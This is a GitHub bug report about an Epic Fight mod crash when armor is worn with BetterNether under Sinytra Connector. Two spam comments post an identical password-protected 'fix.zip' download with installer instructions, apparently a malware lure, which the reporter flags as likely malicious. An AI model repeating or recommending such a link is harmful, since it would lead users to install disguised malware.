### ISSUE TITLE
[Bug|Crash]: Crash if wearing any armor piece while BetterNether installed

### ISSUE THREAD

**Issue by DeshiDesu** [Yesssssman/epicfightmod#1780]
### Please check if a similar issue has already been reported.

- [X] I checked this type of issue has never been reported.

### Please check you're using proper versions.

- [X] I checked all of them in the right version.

### Please check if this issue's from out of our area

- [X] I understood the problem.

### The name of the mod

https://www.curseforge.com/minecraft/mc-mods/betternether/files/4971478

### After all of these, please check if you're just pressing the ok buttons to skip this process.

- [X] I read the checklist and I promise I'll provide all the information that is needed to fix the issue

### Minecraft Version

1.20.1

### The Issue

- Forge 47.3.7
- better-nether-9.0.10.jar
- epicfight-forge-20.9.2-1.20.1.jar
- bclib-3.0.14.jar
- Connector-1.0.0-beta.45+1.20.1.jar
- fabric-api-0.92.2+1.11.8+1.20.1.jar

Equipping any armor piece crashes the game when the Epic Fight model is present. This only occurs when the mod BetterNether is installed. Rejoining the world will result in the same crash so it permanently bricks the world. Interestingly, Epic Fight is the one causing the crash with the following message:
`java.lang.ClassCastException: class net.minecraft.client.player.LocalPlayer cannot be cast to class net.minecraft.world.entity.decoration.ArmorStand`

Crash Log:
[crash-2024-08-25_23.56.08-client.txt](https://github.com/user-attachments/files/16743928/crash-2024-08-25_23.56.08-client.txt)

Console Log:
[latest.log](https://github.com/user-attachments/files/16743929/latest.log)

I found a thread with the same issue on the EF discord, but they never found the bottom of the issue:
https://discord.com/channels/955784714264932362/1275887389277159475

### Steps to Reproduce

- Install the mods from the list above
- Wear any armor piece
- Expect crash, world is now bricked.

https://github.com/user-attachments/assets/36bf4f70-adce-4829-823b-7b7aaea0d184

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DeshiDesu** [comment]
Do not click the link highly likely its malicious

**Comment by guivnf** [comment]
Issue related to sinytra, we don't support them, you can either wait out a fabric port or try and see what's causing this for yourself.
